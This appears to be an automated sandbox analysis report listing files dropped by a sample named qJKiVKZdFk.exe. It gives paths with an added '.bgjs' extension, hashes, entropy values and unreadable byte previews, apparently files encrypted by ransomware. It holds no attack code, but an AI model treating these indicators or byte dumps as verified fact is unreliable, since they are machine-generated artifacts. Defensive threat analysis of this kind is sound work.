                                                                                                                                      Preview:LIJDS_...Z...l...~..I.$.|.....s..k........d....(........n.[...~.U.....K..e.%.p..K.....<...=G...%....:.}....._..'J.mp....\.!.*.B2.....K...i.i...B.e.^.[.X......CF...........D..C..Ym}q..]b.....k~......V.t~....|.......w)rT`)..'...E......FDz.W._.8...d.%.>..a8Q..RY+Y}MY...N5_e.7...A..P0.C_.n.e.....o..@ ...m....#W..&Q#,zp......+,....Q.Fn....'.a.ektN.....Jt..7c.!.V.{..d.!^..Vu...\".....u&../..k%..a..Y*..7...s.^..z.p.UMz..;fd.?...<..>.D...g......._..`.T.......:.C....j...n1`a.....}^.Z..x...y.R.`9....W/uGj.?..'~.b.fZ!Nr..$.'I.\!....A.y.L..O?..U7L..9........xA.'^.........(..9...Y..g...I.6.........."....).V.x.fH(......p.a........4s......0...Vx%.x?...;...L...*o......F.j...# .....`...A.~..z...i..`.@i..7.H..Z'.K2#}X..O7V..>....x..6....@..4Y....0...(...R..z.?..cZ........4>n......,..>V$$.<WB...CN<fKf.t}...2.{A7z..n..CF....^.;,.....wW....a..I..B.4b..... ....Z..........8..{...@...K=.W.....T.G."..hwB...QX...kU...hr......'J.LA...{.E..U.!..^WQ..:!.1qf.+OG.

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\NWCXBPIUYI.jpg.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.86923203516955
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:hU84iWQcZXorQ82xT3vhpWHHtSHGmNgBsC+JnwDF0TUfJYikO4rTBG3i4+7bD:a8DcZCm3vbWHEHGmNAhYikOeTBx4+/D
                                                                                                                                      MD5:7EA444D6F0744A7C18387C817E69F6AD
                                                                                                                                      SHA1:22981CA585FEA4FF89BC60CE2B624F5CD38D0971
                                                                                                                                      SHA-256:4825BDA3F60AD37F087E31428F8832FE008C3C4EECE8290CF7AA44FF800C5816
                                                                                                                                      SHA-512:2F1F7C46111FD8409F29DC51DE99000B5AFB736F9319DCEE23EE8AA6E73E18531F7BD8989D7937A5DC8CEF3AE1A42433BDF94907DD500566542B0CDFA2E6947A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB9}.B..\..s.I..w.{..b{..X....v.).C.D....s....8=...z....._a..t..u ...5~.L... ...O.....+.mMY.'VY..1.#:....*........r=.!.WN8Y.p.G...v..=;.D"A.lWd....@O...F.,.T....D..y.0aU.?.. ...Q.....ah~...*..?'...\./.......I#.......XO....4..W.}.V...v'....;.:{.E.Y..g..J.......$.....;.....1~x.....Q........_..b..1..WB..q.5k.u.if....'.C.'B......=..R...~...L.).......\17..~..eS^Kj....`oZ..S..-u....rH...p.f...Bm.WT.J,.J).f.~..@..!..'.q.h..$.4.....q0..b..x...uc...lJ...jW.c.lE...gU.E/..*...a.p.:.hd..U..K......t.qN..$x.N..n.A.[4.*.M.Z..C fb....E.........Gz.....-...o5=w.k..).[H.--pA.a......_4..P.k....i...>:..M.....x...lM^-..-.l....Jm....3.GHv.h..=....6..q..Gs..Y.-...\O...Y.s...]....p;&.y'.?.H...;.O..wyGAn..P.h...`..n..G.e|..k.s-T....wgz.K..i..3j..9=oc.].....~`$...._f8.$. .a="..L......v.-M5h.......w&....G.......z...Lm.Cs.R..{a.6..q.AS.............hn....N.R...m..N%...h.2.~...4....@`MIJ?c.................C;.KG".h..I.'...m._1w..._s.5...;....PM...$....d.O.........

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\NWCXBPIUYI.xlsx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.835132550026597
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:m8z0HiimIbAvU2V+vZJETJXPpP0VEGifz4Rzo5CDhWIrobD:mkNs2kvZqdXPFWEGaAo5CloD
                                                                                                                                      MD5:47EA6CE64749C1EFA0DC7C96A11A69F7
                                                                                                                                      SHA1:F06A999805A7D375EDB7EB9544558B554F0E53EB
                                                                                                                                      SHA-256:07FF92EC80AA5EDB2FDEA2193CF76CFB437CB930EC32F3D8808FBBF1B155004A
                                                                                                                                      SHA-512:B904C79AB66E757821CB2E7A01C7651394E08C92F46AB4304844C1A8088C7B7E9BFBF48C9637D183B0CA1080968E02C5BBB73DA09188AADD69A7FE19749DB1DA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB.......sC......,dE.,"NT.0..';.4.]..G.64..Ql@..(s..8..&.k..q....3....H.tq..{...EA..pg....(A..hef.a....$"...6+.Ho.6V.........].........*.e.J._.`*{..O.....\..8...];...p.B.s..6..M.E...{#v..h...{..A.P.E_.{..C}........qn2....W...t3.:-..R..l.tv.c...RP.&...Z..i...:.R........$U.tXV.)...B..`..oW.?..4....>.,......@.c......}....M..L...o;QW....../.m.?B...<...J.@=...NF:..7....v.x...R`1....GD-...........a...L..#0.y.`...V|..f....%.........k..*..5.....=y..........ui.h.H......."EN.V..Y....w.....:.M.....Ha...@(..l2....$`r.......=.0.T...F..,..O....%.^..../.4.~CO...q...]H.,....W.......O...bH..O.')...PI..!.].;....G.%*.S].".-....vh. ..m,..R..2....Y..a."..r.5.v...<.....2L+.6..|.....]..|...6)...))8."..'e}J....XK..;.5A......+..C.....8...C......).(.V.L.....p..,......p.KT..uz.Y.s%.._...'.B...q..."Q.b...u.=.k...y.........k....o ..3...........s3.$.|..R...p&...Jc7..*.2..Vh.[...S....J.Rn...=....1..5(..?K.....8.H..)a.y.y........>Z.SU.Cg.%..p%.#T2:...y7..Z...)

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\NYMMPCEIMA.docx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.828028315167497
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:vrN7kQrmWJWSm4lq7nYt3IYm3OrhSKB8Q0jJ58SyiaN/ingEJeS3YibD:vq0Jx8A4YvhAj0SD3ngseSIwD
                                                                                                                                      MD5:05C3A68B2A7349EAF29C65C9CBABA8AC
                                                                                                                                      SHA1:605378A6B198F2CA9A4A8631FD99DE6C2B1033FC
                                                                                                                                      SHA-256:C4FFCB224A8067EDACD011E12709685568FA16C86E2D407F298C484C874BDBBF
                                                                                                                                      SHA-512:5F301193CAF1DC47641B3FE9105BE41A85DA5CC72C2B0AD7383102B181CBDA97282F4B49A1E2276D439AA5DA857DF377720F8A20C7A249BB1BA64CC1E88965BA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP. 16...Q....y.'.h.=....F..U..x.!..,6...U<....@P..S.Te..7..V.....LR!.X..I(;..S.tD....X.R.u.J}...e....iS....L.pH.F.P(P......rvZH._<p..D3...D....x.o.j....dP.A.%U..b.3G...n...>....h.|.n..La:.6. m.x'..N5'+\).]....B.<..x.|..4}..qF.U=X).Sj.-..Y..t..).....m.P5..n.u(.....F@y..(aT.I...2.U...x.+.4..>`.`d.....~....k-V.&....$.gnxjx.|G|...S.6..n...J..`..h.........1d..(.. @.2......rW.+..!q.........i._.a.P..[../.>.@.M.v9.....Q..f..Q..F...Q..U.[..KJ&.B....s..}9.}$..*4&A.kCo.x..E6gY:.h.?l..4.F.b{D.....U....EQ..e..Fy...|Y.....Y.........H...-...=.r....Mb-..>2k......*w....*<~...2../....T....4Z_....m..'J..K6...3...M..-..Y..t&[[*./........ =8.>Y-..9"E<D.....OS;p...w.&.:`. ..N.V.p..I.C.h..#.4:.....i..X.....n.a..h.8....4F..De.6*.".f..p.M..Z.>W.M.fh...{xR. ....i..\....~..n...*..<.d. ..4.>.R6.[. {FA}I.z^.]..K.~BwI....X.....s.A.......X....T.f?.QQu.2].V.ZU...i..V5q.U@vo..Wm.#.R.,mFH.).&[>..N..........@.........=Yxo.\d......N....$..WX`..TT...._.?.P.y.\9.=.."?.P]Fa.r.`.=.

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\NYMMPCEIMA.xlsx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.86377864378953
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:uSG132I1ueQ2eJUfY4NPT+V1WeJVxSWUQ9PLqtf3PQobtRZQA/oh5Nmx3x7bD:m99H/eJw5NP4WcSoLcf3Yob9T+Nm3/D
                                                                                                                                      MD5:4162F3614241BBDA9D7941E9930B928B
                                                                                                                                      SHA1:AB89D1E0CFC35614F0AE8BCDFB8EE1B2F1DDB9A8
                                                                                                                                      SHA-256:147C517DBA7762D77E44CD36113E6027B42CB8C6A3DD138E8A4DEC42AD78ACAD
                                                                                                                                      SHA-512:403280A12EA50E48EF4815B0C42581F6AADAEDC1DEA817A8FA0C6CE18B0613655B44D991C53BCA3B96687F9DE9C9F281F9BA61C5F73D299FC04E4F03AF14CF1E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP.e..q..aH.........I.\...}...Q..r....r.A.ORn.....J.u.Z..I,.Q.e...7.P...[3|D.\..gjY...b.j...b...m;.W.]...%W.W..'........>:.d.)M...~#...%..=..a.ts.B..83D0...{.K..F..U.^..:....#2...6.#..EY<.}............{[.w&,.@.........7.....7...3.D.4.#.F.).6.i.iH.,.Z......b.V${".u.1}<.K..u...A..#.^...5&^..;..^.........w.N..]44.g.gY..&.s../..A.G.&#.q5.Y.G08..P..F.0GL.'Q....],.rhY..y.c..^."c..0lf..2/]. p..Yu.....g.....$s8..`..E..|..*.........L/...]u-Q..`!.jIy9.6.?.&f;I,d.0...D.>3x..Q.#.@b.G..{o..*r*M.+.|C..L?*.aR.l....2>.......4...BM......(J.....r.UX..7.`N...[.4...d..U.&..+..F.R.Sb.5.../.>I.d......Z......9.ku......5'....s..a..,}(.....g..2+0....f.j:.R...v.kh......{.B.....^.:?..2.9`..T.,9.-.Rk...m..i*...f..et<..a...z.M.+O.:N...b...2p%.^.].kL.xFX......v..lA......I...z).7'.8..!=..'....1k$..DT(.ev.~...&k..F..D4.p..(.cr*..e.7.......O....;....2....@.N\d.Z...Q..!....)..)..!..D..x..?...H...1@jy..>2X.!...'\S....AT.b.p..v.....x.HQ...|...,...)m...?..1.\.

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\QCOILOQIKC.docx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.860296936464342
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:7rju0h5lc5Wu1kTkqKyJdrus5PDkxNO4u5E2Mlinfiw0fQuoqTIp4Pl81bD:CWvXktyBLlkxNOvfMqViQuoqUWPl8lD
                                                                                                                                      MD5:C54E82D623107A7050B13F92A8B7D7DE
                                                                                                                                      SHA1:A7B962B68F36E28DB46090BD16CE112987D1A3E1
                                                                                                                                      SHA-256:2222994B3720BBFCC38B948F745EF4BC05FC33D07AEEDE188958FD345C41F10F
                                                                                                                                      SHA-512:435B1B796D4144D95443C9724FF3011BF7A886F106D3A92345A055AC215EBAEE7137D1C19C2AB9A4127D19A70CC8385D5B1933DCFD615932E611CB13D88FA7B4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:QCOIL|l.U.....AFia.).E.$[c...d..u^.8=..B.P..VP...NI..B...(.....l.....lu!...i.9K..j..j/N..y.d!..w.......#4....Mh...|?......IB..2.........=..H.4E..P.?.....e...<L..7_....A..=M..Z.Q?B.@@...v(...w..bY.C..(.f.....A.,...4;|.b..........h.%..t..B........8)..t6..%..k...<.VN{...t%.<C,........Li..x...z..8..T5.Ha.R...... ...+$(.....GL..,.w.V.V?(X.S^r........\..Ai.........P..H.....~o....jT.M#....A_..:.#D......H{..I?$...C2.o.X....d.......NeD....!...}6...U.+P...$....U..*j.fQ.....o..3.Qs..o.y@!0..........M.!.Nxh....s!(.....]..t2..=......t......|..0q..n.0>.d....v>i....:.......Mk..odTI8.n.:_.t..|8Q..|'/.DT2......;.6../...7nIg.m^...._..0.S.....!....'.9....[s...b...Q.[Y.1..X....9.2....E%.....m.Z.x..s.M..Mi.y'@n[?.0..L..-.}!.&p>=f.*.vY..|S..=8...q..h. ..).@../j...%.\..........^.....SDB.'85.M.F.=@L.].M............6l.'.mV......7.7.h../8.h..O{..u.,.V..).7B.5I...6...........<%.*....'...9..c..z..%..:...........|4..J!.......b..l.@.G.F.8.D... 6.

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\UBVUNTSCZJ.pdf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:HIT archive data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8504875818617235
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:/5cuz+sD9jG4fu/uaCaLCDBuE1s/jz8+4roDTwiipXuUsO9TuHu0vR1sm7bHQUpP:/uuz+sD9lu/ua3+YVIvcXwLBuUswaH1F
                                                                                                                                      MD5:DCAE1B86381AB0DEC81D95C7E3036040
                                                                                                                                      SHA1:4FB4DFF3A801FB9199476BE3F72DBC96A04E96A5
                                                                                                                                      SHA-256:051A538ADCD516D8F312F5D74EF3F1A060B344D06BD42CFA1532D6145F133D13
                                                                                                                                      SHA-512:91D57BB66C6D24C8E93122F379D0EB3FACD9F1690DBCA19791DC316F6DC062EB15B50710AA91F571630C9D66712999DC4CF218969A5B2D8D0214EEF32B331AAE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:UBVUN........v.[.vy\R5.B<=e..3"...m...q%.H.A3u..~. ze.^b#.....4.hq...3=.V.+jN...wH.$.)OM.....+...C7%..}..\I.C.hQ'../...e.S.= .dr|&_ C:...M..x..8kK!.....`.;G...9o.T.rq.f..KI.....}.<u!.J..R...5.....I.y.crzzl..<D.5......C..$....-+=.]...c%.M.L`...@.@+.1..x8.i.\n.U.^.l.a...<.{j.....;*p..A'ia2..o;...>J.)...P.....>......*b...M.g.z.2.8`.P)...h.;.....j...;z.P..~.8...3.Il..B5.|....$&)9,......\..f..Z.E..}.....].%....cGi..(q.j...*............g....eo.*....Yj(6....a....Mb.6.........U.._.3..H..PB..P.5..I...D4_.R....,....e.!|.2..PQr&.....I$0.X..2St^..!U|...Sd.e.A....0...V%|DS....p...S....9}..hcC.Y..?...BY..r...Z.=.{I...y.G4...).E.b..<w...e........x..+Y.-.A..7.?...t..S..4.yO.....@g...X.....r.....Kkc..Z.=...Xh.c.[..+..[.~...#.2.*..KE_...5,.-i..1..`.`...I.bc...oSt.....S.X.7.~.....0+..Yf...~.d....b.......r5x...kY.5m...3...e.&x.].......W.B:.*.8.M..D..4..E..;....c.h.J.CU../r.oQVF....b*.F.....4-.9.....x>R..7......5...D...[<....$C...._..)V#.\.KL.q@m9.}..=...7;...

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\VWDFPKGDUF.mp3.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.850394328626695
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:KxK8VQmv4RvwcPq8HC1LzdcrxsKdEZ98kmDXZB5lcUOLn+zP0guYcfCEdZbD:ypSk4lfitzdWsZZTmbZ3iUI+QAca8D
                                                                                                                                      MD5:11FE3C02EE6AA39F0C2672CAA1C62DFD
                                                                                                                                      SHA1:C03D5F193677D714268B699BC06695000B172767
                                                                                                                                      SHA-256:9F376BAA82E77FAD05CE9A7A1D520FB643FF010A51DCBD2F5E8831B4351558F5
                                                                                                                                      SHA-512:6FF0D70076D1E0C8E670E1AE833E11F1C7FDBDCBC3577A10D03D25CF03812B5AD451831D34CDCD50EDDE40596EB8173BB1E92A8FD995FA341724729E62F802A6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:VWDFP......i-....6....P.......'...?..I.#4.xI..F!.ADf........e.#....*|X#Nd=j......OT.m&..........D.x.7hsf....Q...P..3..QI.b}.lv.j.l...qq.wp...2s...ik...W..\.....`n..5h.v.^X[JWj.AD..%....d......?u...-.=.B;..Q.Q..A.Y.$A....w...d.g.O]...^..wr.S........{.FR5k..@.|....w.t.bM.....a..Jw...&..@..Z.1F$BN.....].'MH.s..p.....l.]..Z_..B....C../r..4.D=^..>.......3Ce(....P..L.&S.+.s.~....@6.....i..H...e.P...E.+.;..R....bJ.I...L..?....$...I.h/8......t....l.....+.K..k...<...v.f=Tn.....b.>..f..&0Y%...d....,~].......;..;{t...H....c...Qr..A....).........S.xtT..e.....e.\.f..._c.Wmu.x..,.....@i.h..QZ.j......ED....f........Z...Pv.2.f.O.....!..(...D]..R...6..."..X[...o?8..v.1I^.....K.Ffe3...Z.[.!/..iY`l...'............:.P.~xk...<.8V............l)..\./.~...I...e..]l;\.O>f..tE..kJ....t.]...D.Q....o..bP..r..e.D..VON.,O......!}\..D.4.p.2.X..Bw;.\.-.!.|..=......#....c.K. @..i..lRt...:..2.Sv...D..*P..>..\S...s..0.l...\..=.0..<#S~.....V.$M..Qa.a.v...........OZ.Y|.Q.|.....

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\ZIPXYXWIOY.pdf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.823419923875632
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ZMIdCH9IT/ZpKnqT5FnjHWgwmWMXJ+gTcNWwOiREwK8l9Tf/ybD:RCH9q/KnqP2NAXJ+gi7OiiwK5D
                                                                                                                                      MD5:01D49AE747706038260786BB4BA819C8
                                                                                                                                      SHA1:C83BBCF18F29D2D6FA16FA415ECADF33CD3522CD
                                                                                                                                      SHA-256:B2D6D4D048DB57FC1E0D411F3D3C6029D47371482BC42883AEBF359CAD0D1611
                                                                                                                                      SHA-512:E5174231ABF5A7028B6980C35A1D7C8E8E541B61DE6ECC583F920CC95F980B330B075E1132DDFAD67CD188728310F3521B3DF99D45CB07FC9D82EEDC7AA65A33
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZIPXY...bU>.=.\.....4.|...+......5-X.D..{......o.p.................e9@8'...v&.......*4..+..T~6....7X/.f5.\..%..+.7&.....3.....vl-....5R..(.11.T62.......V..6..N.s}..R.Kb....k\..g.X....gy.R..=j.(..X..Zn.s.-.....F3.u.[..5X!.'...Z.....X....<... +%..cv.]YK.Y......g..".19....+...SsP...7 .t-l0X...,..$.....G...I.w.........D.t@..[.5.#.@S3-.{.l..evC.V>......-.R.0..........X.........2...}j.J..\.<.t....}.e5...R.Oymc{."5S.l..V..C..YI..rQ3.P.9j..t.$..j... ...Vv...i+rtt4..L).E.Lr.d........[..Eq.@r..*@.E.$g.,m1...6E.../4L...M..".wa.Hud.z9..u...i........^..*.%...8.0i..&m.[.N....".c.....$4O..g.2?.d./.G....../......\...UZ.*.;...}.e.A.~1..%D... ..@'`..M.8... 8m..Gx`...}b.nb.........e{.+(..#HWqT....3...~y...0......0Z9.2p...F...czEk.DQ...W.3.2...@.0....8....V^........2i)..s...q...k.......=?..U.>...........h.s4..J*..&O.o...u ....9.4...M..!@2W.*e5..Pr....V.6.1O..J..5..........V.f.n.$./.3.,.:.(....;W=....8..)r..G.U`.^.[.9...`..:....ad...5..D..&.

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\ZUYYDJDFVF.jpg.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.84556529208704
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ayHKXDnTdu4pU/zikJSnyPwyHacNFsz5Lw2L7HgaonGvnWUbD:ayHsDTdjpSikInyPlLFs1FzoGdD
                                                                                                                                      MD5:C9F601990BE7D5211D4740E4B64A6ADB
                                                                                                                                      SHA1:C51D8F91ED3656FD476DCFD5EAD0118C729EAACA
                                                                                                                                      SHA-256:298CC7AEF85043ECF280172DEB0F5690C2FB93F1E57E207DEB06F1CD12B02471
                                                                                                                                      SHA-512:71642177FBD71D92C1A5794CACB73A04DAEB04473414B5EE7E6260232C66C353F643219E4510A6248A34A3284BA5557C22AB7C4AA70EE6B0A65DA87CB76C7D63
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZUYYD.%..:..r^.1....-...@..=T...m.....3.x."..xc}..ui.<.0M\..=5....S....i..C!..h.d.jQ.6.....c.b.v.O).|..+......w..A..@.w.)..A.0.;#M..p...0..E.r^.'.7.n.'...Y.O..;..5.AL1....1......{...*`o...=.m...Z....J$J .F...Gb<u....n.z......U..p.E;.\..R)M.....X. .D\...Q...I...+... M_8v..@...>...6..3..3..v.7...fJ...g...".W...k.....~..;...'...@.X.......s.~.YR...cqU...t0.5...z.t..U..rL.......C.>.....X:.........N.0.H..#:.{^.m.{.H..mH....A.I..h}..J.........~...;._.H.7r."......C.*..v.15b{m...@8..+..O....?Vk2S!...A.6..!..a...z$...*}.B.,.-k.ZTLQ?..)+..%m...9..G....yVY.....\.AhI.5..;Y!..7.....)D.bR.....M. }....x.......d.8...b3.>R.4.)....@....Q\.l.!p.V=P..lY...............#.]...0.....M.;?.1'H.6)M.*c..10..E..a2...b}..u.q%.U.F|...*.[<.....|........&KV..V......[.C.....v......'b..q5.?.W....x.............an.0...Oy..<...D.a..)Hk..o.#......:fl..pZ./...D4....=S....s...F.......iw.4.z=I...R?...h.`......T....W%.@?.4!.?!.}.9,Nc.......v3.).5..`.O.G.j.+.r.t.+u..7|...H..

                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\ZUYYDJDFVF.xlsx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.847323927615213
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:iCwpwbDIUXCza2/ni69hCmF7zFewfcosYQT15NRhGPbD:iN2XIMCO2l9h17QQxC1FqD
                                                                                                                                      MD5:7CFE11402ED74841B06326B152C2DC7D
                                                                                                                                      SHA1:B0FEC80D6E48BBEEC7E06D6CC997487404254935
                                                                                                                                      SHA-256:B515F3BC9D31079AF3D162A0F543B221EB8617CA6B6CE68875DB320EF4D2A3EE
                                                                                                                                      SHA-512:56F7C913E1C90CDBDB8F6B4C3CAD217965FABBBA33415A8BDCE29F7785BCDC2644F4BEAA4D41AD6612D82D417E34A6F0778881DDB10FD06C8B23D2A3F3C94471
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:ZUYYD)p!.-xa..W..=9..Io<=..y.......7.cY]......i..+.=.....r.....Sh.t...efN..m..5. E.......v...nt$p5\.\....J.i..7~...I.....\.:A>........?...|+"...&0..JE..u>].T..p...dY..u...p1...n...S.Y....a...hk......#..P Pi.2Nhw.../...:/..%..Y.......@7..Jb....5..=v.ea....{I.|.H..gG..ec..&w..L...uW.d..2....H.P......2.....r("...IgL9Y-.t........J..z.m.o.5!..v..3..'k8...../...+`wL......~.........5.W.H?.7.....R.~..px.;.G.{J..=5........-.'...G..q.P...._......!/...q..]...T..'.t.m.&...|.......g....xJ-..x...F:..~t.Z!>.vF..t.@...Q....Gp...B... ..qk...I....K..o..*.,X..i...H\v...@|v.... .Y"t.]K.....,U=....B)?....R.....<..........H..9....h.O{-.)N..w..7..-f...e...pl.(.....u(......G..z..h.-.]ED1...S.G`2...l0..SN.dx..Q/.=.\B.".....Y...w../"rPC.R%h-.E.oo..3.V..b&..8V..o..T.G\...-._W.:.......0.....~...M.....+....(.SuMO.buP......M.t.N`[.}..vB.Y.Y.`.HV.MB...l.y&]...J....T.c...kAZ...z$<I%..>-.P.c.l..f..RO.......Z.R.U4.e-*......i....r.'.^.l....9...I....w...U......&G.

                                                                                                                                      C:\Users\user\Desktop\CZQKSDDMWR.png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.851622047856416
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ACZQscN3DiaV7lHeiMFOtuZMBm5ST9AabYaiIjXwIE0dDhaULubD:AMpDiMFO2MBm5STKa/gIE0dD86MD
                                                                                                                                      MD5:A1C49739C87C4C3A34AC732F624ED8C0
                                                                                                                                      SHA1:3D7BDF579511AEDDFC5A77B8781301FF5A31DBA2
                                                                                                                                      SHA-256:D055542C9AC09C5F8FB0E43727B5EE4F24AFD13D2CF7F39130B22FDDF419AE7A
                                                                                                                                      SHA-512:47817B88F74F96E53D8D331DEDE692BD8AB92C0C4825A7FBAB3FC9CEF8F56CE1805D62496C3A065A3B28D04688D11C19A24952633B51A22D69975EDFFFC5AD35
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CZQKS......@2.0.&..SX}T....R.h.....u......'..(.}T]..R.l+. c6.M...RD.t......D.9\......)..k<.KIx.:}.S.y......a.5..E.<V..........x(}.....=.$.v..d[8..G.....R..bb..j/~.1....?.....qS..E..E.....W...zA...M..p..-nP......|G`..b&Z..|Z......o...K.4.II.GF.nzK.[..].U.E2t...!..Q.c..z......T..V.q!dF.k.(..C...o.S......xp....I....#b.....Q..'..u}.U.)Utrb.(.".k....F....2..........:|T.."W.<k).J.p..[.Y{...7o..h..M,.g....D..%u..h.s>3.k..j.x^....2.Uo.%.yf..oL.,e.;..O..Nq...3...v....Yv.gH..?..B....ZlI..w.....Y.k.'= ..C$..}.....BE.+C..^>.....].mZ....0.=.:M..x...T....G....^.nC....0Ki....]f..0....8...vl.@...!C..,.H.......}.4..<.C.....a[..j......T.1K<w..9.....m.7...N..0...F.f8.....p...x1m...../..B..........LZ..P8..f=u....$...z..X...d$.........X..9..%.0K..C..c..k....iQ..Y.).N7..N.[..|..p.7..y..lq.BTXE.........iu.w..0...l...&7...m....?1..)...T......5x..C1...=T..L...........H..*K....vg.8....j.....e.. ....U8M&.}.......'..{.a(..Om.3*...[. ^.D.,.....weC2.P

                                                                                                                                      C:\Users\user\Desktop\CZQKSDDMWR.png.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.851622047856416
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ACZQscN3DiaV7lHeiMFOtuZMBm5ST9AabYaiIjXwIE0dDhaULubD:AMpDiMFO2MBm5STKa/gIE0dD86MD
                                                                                                                                      MD5:A1C49739C87C4C3A34AC732F624ED8C0
                                                                                                                                      SHA1:3D7BDF579511AEDDFC5A77B8781301FF5A31DBA2
                                                                                                                                      SHA-256:D055542C9AC09C5F8FB0E43727B5EE4F24AFD13D2CF7F39130B22FDDF419AE7A
                                                                                                                                      SHA-512:47817B88F74F96E53D8D331DEDE692BD8AB92C0C4825A7FBAB3FC9CEF8F56CE1805D62496C3A065A3B28D04688D11C19A24952633B51A22D69975EDFFFC5AD35
                                                                                                                                      Malicious:false
